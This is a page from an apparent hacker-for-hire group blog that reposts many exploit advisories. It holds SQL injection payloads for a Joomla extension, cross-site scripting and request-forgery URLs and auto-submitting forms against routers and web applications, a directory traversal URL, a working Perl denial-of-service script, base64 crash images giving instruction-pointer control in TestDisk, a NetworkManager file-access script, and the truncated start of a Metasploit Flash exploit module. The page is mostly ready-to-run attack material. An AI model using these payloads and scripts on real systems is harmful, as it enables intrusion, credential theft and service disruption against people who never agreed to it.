Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138719

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL
injection in the country_id parameter of the request made to retrieve a
list of states for a given country. The version was not bumped when the
vulnerability was fixed, but if you download after April 27th, you
downloaded a fixed version.

http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property

http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html

Example URL:

http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31


Parameter: country_id (GET)

   Type: UNION query

   Title: MySQL UNION query (NULL) - 2 columns

   Payload:
option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31'
UNION ALL SELECT
NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)#



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
HireHackking 
source: https://www.securityfocus.com/bid/52095/info

The Machine component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_machine&view=machine&Itemid=[SQL Injection]
http://www.example.com/index.php?option=com_machine&view=machine&Itemid=xxx&idMacchina=[SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/52098/info
 
Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.
 
The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible.
 
http://www.example.com/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=www.example2.com&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply
HireHackking 
source: https://www.securityfocus.com/bid/52098/info

Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.

The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible. 

http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
HireHackking
source: https://www.securityfocus.com/bid/52100/info Dragonfly CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Dragonfly 9.3.3.0 is vulnerable; other versions may be affected. http://www.example.com/index.php?name=coppermine&file=thumbnails&meta=lastup%22%3E%3CsCrIpT%3Ealert%2852128%29%3C%2fsCrIpT%3E&cat=0
HireHackking
source: https://www.securityfocus.com/bid/52106/info Mercury MR804 router is prone to multiple denial-of-service vulnerabilities. Remote attackers can exploit these issues to cause the device to crash, denying service to legitimate users. Mercury MR804 running version 3.8.1 Build 101220 is vulnerable. #------------------------------------------------------------- #!/usr/bin/perl -w use Socket; $|=1; print '*********************************'."\n"; print '* mercurycom MR804 v8.0 DoS PoC *'."\n"; print '* writed by demonalex@163.com *'."\n"; print '*********************************'."\n"; $evil='A'x4097; $test_ip=shift; #target ip $test_port=shift; #target port if(!defined($test_ip) || !defined($test_port)){ die "usage : $0 target_ip target_port\n"; } $test_payload= "GET / HTTP/1.0\r\n". "Accept: */*\r\n". "Accept-Language: zh-cn\r\n". "UA-CPU: x86\r\n". "If-Unmodified-Since: ".$evil."\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;". " .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n". "Host: ".$test_ip."\r\n". "Connection: Keep-Alive"."\r\n\r\n"; $test_target=inet_aton($test_ip); $test_target=sockaddr_in($test_port, $test_target); socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n"; connect(SOCK, $test_target) || die "cannot connect the target!\n"; send(SOCK, $test_payload, 0) || die "cannot send the payload!\n"; #recv(SOCK, $test_payload, 100, 0); close(SOCK); print "done!\n"; exit(1); #-------------------------------------------------------------
HireHackking

ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52112/info ContentLion Alpha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. ContentLion Alpha 1.3 is vulnerable; other versions may also be affected. http://www.example.com/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script>
HireHackking

Chyrp 2.1.1 - 'ajax.php' HTML Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52115/info Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Chyrp 2.1.1 is vulnerable; other versions may also be affected. <form action="http://[host]/includes/ajax.php" method="post"> <input type="hidden" name="action" value="preview" /> <input type="hidden" name="feather" value="" /> <input type="hidden" name="field" value="" /> <input type="hidden" name="content" value='<script>alert(document.cookie);</script>' /> <input type="submit" id="btn"> </form>
HireHackking

Oxwall 1.1.1 - 'plugin' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52125/info Oxwall is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Oxwall 1.1.1 and prior versions are vulnerable; other versions may also be affected. http://www.example.com/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E
HireHackking

Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52136/info Mobile Mp3 Search Script is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. Mobile Mp3 Search Script 2.0 is vulnerable; other versions may also be affected http://www.example.com/dl.php?url=http://www.google.it
HireHackking

TestDisk 6.14 - 'Check_OS2MB' Stack Buffer Overflow (PoC)

HACKER · %s · %s

( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. TestDisk 6.14 Check_OS2MB Stack Buffer Overflow Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX PDF: http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf +-----------+ |Description| +-----------+ This document details a stack based buffer overflow vulnerability within TestDisk 6.14. A buffer overflow is triggered within the software when a malicious disk image is attempted to be recovered. This may be leveraged by an attacker to crash TestDisk and gain control of program execution. An attacker would have to coerce the victim to run TestDisk against their malicious image. +------------+ |Exploitation| +------------+ The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer overflow. This is due to the 512 byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being overflowed by a subsequent memcpy call in the cache_pread_aux method (hdcache.c, line 109). The third argument to the memcpy call (defining the amount of data to be copied) is controlled by the attacker, this is set in a header in the test case (offset 0xC in the below testcase, set to 2048, or 0x0800). The following GDB output shows the vulnerable memcpy call and the attacker controlled size argument (0x00000800): Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0, buffer=0xbffff0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109 109 memcpy(buffer, cache->buffer + offset - cache->cache_offset, count); (gdb) x/i $eip => 0x804e5c2 <cache_pread_aux+298>: call 0x80499f0 <memcpy@plt> (gdb) x/3x $esp 0xbffff010: 0xbffff0f0 0x080c3000 0x00000800 The following base64 data contains the test case which results in EIP control, in this case EIP being set to BEE5BEE5. The value EIP is overwritten with is at 0x20c 6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5 IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW 1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA AAAAAAAAKY9iYu3lvuW+NAsGCA0K --[ Linux Note that in the provided test case, 4 bytes at 0x210 have been set to a valid address within the TEXT segment of the TestDisk ELF file. This is due to GCC 4.7.2 compiling the Check_OS2MB method with the following assembly code: 0x08060a8d <+71>: call *%ecx 0x08060a8f <+73>: mov %eax,%edx 0x08060a91 <+75>: mov 0x8(%ebp),%eax 0x08060a94 <+78>: mov 0x194(%eax),%eax 0x08060a9a <+84>: cmp %eax,%edx 0x08060a9c <+86>: je 0x8060ac5 <check_OS2MB+127> The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled portion of memory into the EAX register and subsequently tries to read from that address ('mov 0x194(%eax)'). Thus, this has to be set to a legitimate address, otherwise TestDisk performs an out-of-bounds memory read before returning from the check_OS2MB method. As long as EDX and EAX do not match, the check_OS2MB method calls screen_buffer_add and log_redirect, then jumps to the end of the check_OS2MB method, successfully exploiting stack overflow and gaining EIP control. The precompiled version of TestDisk has been compiled with a stack protector. In order to exploit the precompiled version, an attacker would have to find a way to bypass GCC’s '-fstack-protector' functionality --[ Windows The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the precompiled version of TestDisk. This was tested on Windows 7 and 8.1. --[ Mac OSX An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14, however the original test case needs to be padded. The value EIP is overwritten with is at 0x21C in the OSX test case. The base64 of the OSX crash test case is below. As in the above examples, EIP is overwritten with 0xBEE5BEE5. 6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5 IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW 1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA AAAAAAAAKY9iYu0AAAAAAAAAAAAAAAAAAAAA5b7lvg== +----------+ | Solution | +----------+ Upgrade to TestDisk 7.0 or newer. +-------------------+ |Disclosure Timeline| +-------------------+ 9/04/2015 – Advisory sent to Christophe Grenier. 9/04/2015 – Response from Christophe Grenier advising that a fix is ready for the development version. Christophe advised a new stable version will be available in 2 weeks. 18/04/2015 – TestDisk 7.0 Released. 30/04/2015 – Release of this document. +-----------------------------+ |About Security-Assessment.com| +-----------------------------+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web www.security-assessment.com Email info () security-assessment com Phone +64 4 470 1650
HireHackking

Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52170/info Webglimpse is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. Webglimpse versions 2.18.8 and prior are affected. http://www.example.com/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T http://www.example.com/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
HireHackking

GNOME NetworkManager 0.x - Local Arbitrary File Access

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52206/info GNOME NetworkManager is prone to a local arbitrary file-access vulnerability. Local attackers can exploit this issue to read arbitrary files. This may lead to further attacks. NetworkManager 0.6, 0.7, and 0.9 are vulnerable; other versions may also be affected. #!/usr/bin/python # # Copyright (C) 2011 SUSE LINUX Products GmbH # # Author: Ludwig Nussel # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # version 2 as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA import gobject import dbus import dbus.service import dbus.mainloop.glib import os import subprocess def N_(x): return x _debug_level = 0 def debug(level, msg): if (level <= _debug_level): print '<%d>'%level, msg class NetworkManager(gobject.GObject): NM_STATE = { 0: 'UNKNOWN', 10: 'UNMANAGED', 20: 'UNAVAILABLE', 30: 'DISCONNECTED', 40: 'PREPARE', 50: 'CONFIG', 60: 'NEED_AUTH', 70: 'IP_CONFIG', 80: 'IP_CHECK', 90: 'SECONDARIES', 100: 'ACTIVATED', 110: 'DEACTIVATING', 120: 'FAILED', } NM_DEVICE_TYPE = { 0: 'NM_DEVICE_TYPE_UNKNOWN', # The device type is unknown. 1: 'NM_DEVICE_TYPE_ETHERNET', # The device is wired Ethernet device. 2: 'NM_DEVICE_TYPE_WIFI', # The device is an 802.11 WiFi device. 3: 'NM_DEVICE_TYPE_UNUSED1', # Unused 4: 'NM_DEVICE_TYPE_UNUSED2', # Unused 5: 'NM_DEVICE_TYPE_BT', # The device is Bluetooth device that provides PAN or DUN capabilities. 6: 'NM_DEVICE_TYPE_OLPC_MESH', # The device is an OLPC mesh networking device. 7: 'NM_DEVICE_TYPE_WIMAX', # The device is an 802.16e Mobile WiMAX device. 8: 'NM_DEVICE_TYPE_MODEM', # The device is a modem supporting one or more of analog telephone, CDMA/EVDO, GSM/UMTS/HSPA, or LTE standards to access a cellular or wireline data network. } NM_802_11_AP_SEC = { 'NM_802_11_AP_SEC_NONE': 0x0, # Null flag. 'NM_802_11_AP_SEC_PAIR_WEP40': 0x1, # Access point supports pairwise 40-bit WEP encryption. 'NM_802_11_AP_SEC_PAIR_WEP104': 0x2, # Access point supports pairwise 104-bit WEP encryption. 'NM_802_11_AP_SEC_PAIR_TKIP': 0x4, # Access point supports pairwise TKIP encryption. 'NM_802_11_AP_SEC_PAIR_CCMP': 0x8, # Access point supports pairwise CCMP encryption. 'NM_802_11_AP_SEC_GROUP_WEP40': 0x10, # Access point supports a group 40-bit WEP cipher. 'NM_802_11_AP_SEC_GROUP_WEP104': 0x20, # Access point supports a group 104-bit WEP cipher. 'NM_802_11_AP_SEC_GROUP_TKIP': 0x40, # Access point supports a group TKIP cipher. 'NM_802_11_AP_SEC_GROUP_CCMP': 0x80, # Access point supports a group CCMP cipher. 'NM_802_11_AP_SEC_KEY_MGMT_PSK': 0x100, # Access point supports PSK key management. 'NM_802_11_AP_SEC_KEY_MGMT_802_1X': 0x200, # Access point supports 802.1x key management. } def __init__(self): self.bus = dbus.SystemBus() self.proxy = None self.manager = None self.running = False self.devices = {} self.devices_by_name = {} self.aps = {} self.ap_by_addr = {} self.ap_by_ssid = {} self.check_status() self.bus.add_signal_receiver( lambda name, old, new: self.nameowner_changed_handler(name, old, new), bus_name='org.freedesktop.DBus', dbus_interface='org.freedesktop.DBus', signal_name='NameOwnerChanged') self.bus.add_signal_receiver( lambda device, **kwargs: self.device_add_rm(device, True, **kwargs), bus_name='org.freedesktop.NetworkManager', dbus_interface = 'org.freedesktop.NetworkManager', signal_name = 'DeviceAdded', sender_keyword = 'sender') self.bus.add_signal_receiver( lambda device, **kwargs: self.device_add_rm(device, False, **kwargs), bus_name='org.freedesktop.NetworkManager', dbus_interface = 'org.freedesktop.NetworkManager', signal_name = 'DeviceRemoved', sender_keyword = 'sender') def cleanup(self): self.switcher = None def devstate2name(self, state): if state in self.NM_STATE: return self.NM_STATE[state] return "UNKNOWN:%s"%state def devtype2name(self, type): if type in self.NM_DEVICE_TYPE: return self.NM_DEVICE_TYPE[type] return "UNKNOWN:%s"%type def secflags2str(self, flags): a = [] for key in self.NM_802_11_AP_SEC.keys(): if self.NM_802_11_AP_SEC[key] and flags&self.NM_802_11_AP_SEC[key]: a.append(key[len('NM_802_11_AP_SEC_'):]) return ' '.join(a) def nameowner_changed_handler(self, name, old, new): if name != 'org.freedesktop.NetworkManager': return off = old and not new self.check_status(off) def device_add_rm(self, device, added, sender=None, **kwargs): if (added): dev = self.bus.get_object("org.freedesktop.NetworkManager", device) props = dbus.Interface(dev, "org.freedesktop.DBus.Properties") name = props.Get("org.freedesktop.NetworkManager.Device", "Interface") devtype = props.Get("org.freedesktop.NetworkManager.Device", "DeviceType") debug(0,"device %s, %s added"%(name, self.devtype2name(devtype))) self.devices[device] = name self.devices_by_name[name] = device if devtype == 2: wifi = dbus.Interface(dev, "org.freedesktop.NetworkManager.Device.Wireless") aps = wifi.GetAccessPoints() for path in aps: ap = self.bus.get_object("org.freedesktop.NetworkManager", path) props = dbus.Interface(ap, "org.freedesktop.DBus.Properties") ssid_raw = props.Get("org.freedesktop.NetworkManager.AccessPoint", "Ssid") addr = props.Get("org.freedesktop.NetworkManager.AccessPoint", "HwAddress") wpaflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "WpaFlags") rsnflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "RsnFlags") ssid = '' for b in ssid_raw: if b > 20 and b < 126: ssid += str(b) else: ssid += '0x%02x'%b self.aps[path] = { 'Ssid' : ssid_raw, '_ssid_readable' : ssid, 'HwAddress' : addr, 'WpaFlags' : wpaflags, 'RsnFlags' : rsnflags, } self.ap_by_addr[addr] = path if not ssid in self.ap_by_ssid: self.ap_by_ssid[ssid] = set({}) self.ap_by_ssid[ssid].add(path) for ssid in sorted(self.ap_by_ssid.keys()): print ssid for path in self.ap_by_ssid[ssid]: ap = self.aps[path] print ' ', ap['HwAddress'] if ap['WpaFlags']: print " WPA: ", self.secflags2str(ap['WpaFlags']) if ap['RsnFlags']: print " RSN: ", self.secflags2str(ap['RsnFlags']) else: if not device in self.devices: debug(0, "got remove signal for unknown device %s removed"%device) else: name = self.devices[device] del self.devices[device] del self.devices_by_name[name] debug(0,"device %s removed"%name) def _connect_nm(self): try: self.proxy = self.bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager") self.manager = manager = dbus.Interface(self.proxy, "org.freedesktop.NetworkManager") running = True except dbus.DBusException, e: running = False print e return running def check_status(self, force_off=False): if (force_off): running = False else: running = self.running if (not self.manager): running = self._connect_nm() if (running): if (not self.running): devices = self.manager.GetDevices() for d in devices: self.device_add_rm(d, True) if (not running): self.proxy = self.manager = None self.running = running debug(1,"NM Running: %s"%self.running) def addcon(self, params, device, ap = '/'): if device[0] != '/': if not device in self.devices_by_name: print "Error: device not known" sys.exit(1) device = self.devices_by_name[device] if ap[0] != '/' and not 'ssid' in params['802-11-wireless']: params['802-11-wireless']['ssid'] = [dbus.Byte(ord(c)) for c in ap] if not ap in self.ap_by_ssid: print "Warning: ssid not known" ap = '/' else: ap = '/' self.manager.AddAndActivateConnection(params, device, ap) if __name__ == '__main__': from optparse import OptionParser parser = OptionParser(usage="%prog [options]") parser.add_option('--debug', dest="debug", metavar='N', action='store', type='int', default=0, help="debug level") (opts, args) = parser.parse_args() if opts.debug: _debug_level = opts.debug dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) mainloop = gobject.MainLoop() bus = dbus.SystemBus() nm = NetworkManager() if len(args) == 0: #mainloop.run() True elif args[0] == 'new': conn = { 'connection': { 'permissions': [ 'user:joesix:' ], 'autoconnect': False, 'type': '802-11-wireless', }, '802-11-wireless': { #'ssid': [ dbus.Byte(ord(c)) for c in "something" ], 'mode': 'infrastructure', 'security': '802-11-wireless-security', }, '802-1x': { 'eap': [ 'tls' ], # peap, ttls 'client-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cert.pem' ] + [ dbus.Byte(0) ], 'private-key': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/key.pem' ] + [ dbus.Byte(0) ], 'ca-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cacert.pem' ] + [ dbus.Byte(0) ], 'private-key-password': "12345", #'ca-cert': 'hash://server/sha256/5336d308fa263f9f07325baae58ac972876f419527a9bf67c5ede3e668d3a925', #'subject-match': '/CN=blah/emailAddress=foo@bar', #'phase2-auth': 'mschapv2', 'identity': 'test1', #'password': 'test1', }, '802-11-wireless-security': { 'key-mgmt': 'wpa-eap', 'auth-alg': 'open', }, } dev = args[1] ap = None if len(args) > 2: ap = args[2] nm.addcon(conn, dev, ap) # vim: sw=4 ts=8 noet
HireHackking
source: https://www.securityfocus.com/bid/52221/info Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. &lt;form action=&quot;http://www.example.com/admin/auth.php&quot; method=&quot;post&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;new_pwd&quot; value=&quot;1&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;new_pwd_c&quot; value=&quot;2&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;login_data&quot; value=&#039;&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&#039; /&gt; &lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt; &lt;/form&gt;
HireHackking
source: https://www.securityfocus.com/bid/52221/info Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. http://www.example.com/admin/comments.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/comments.php?sortby=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/comments.php?order=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/comments.php?status=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible. http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
HireHackking
source: https://www.securityfocus.com/bid/52113/info Dolibarr is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks. Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected. http://www.example.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!]
HireHackking

Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52117/info Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Chyrp 2.1.2 is vulnerable; other versions may also be affected. <form action="http://[host]/includes/error.php" method="post"> <input type="hidden" name="ajax" value="1" /> <input type="hidden" name="body" value='<script>alert(document.cookie);</script>' /> <input type="submit" id="btn"> </form>
HireHackking

D-Link DCS - 'security.cgi' Cross-Site Request Forgery

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52134/info The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability. Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. This issue affects D-Link DCS-900, DCS-2000, and DCS-5300. <html> <body onload="javascript:document.forms[0].submit()"> <form method="POST" name="form0" action="http://www.example.com/setup/security.cgi"> <input type="hidden" name="rootpass" value="your_pass"/> <input type="hidden" name="confirm" value="your_pass"/> </form> </body> </html>
HireHackking
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory', 'Description' => %q{ This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Vulnerability discovery 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2014-8440'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'], ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'], 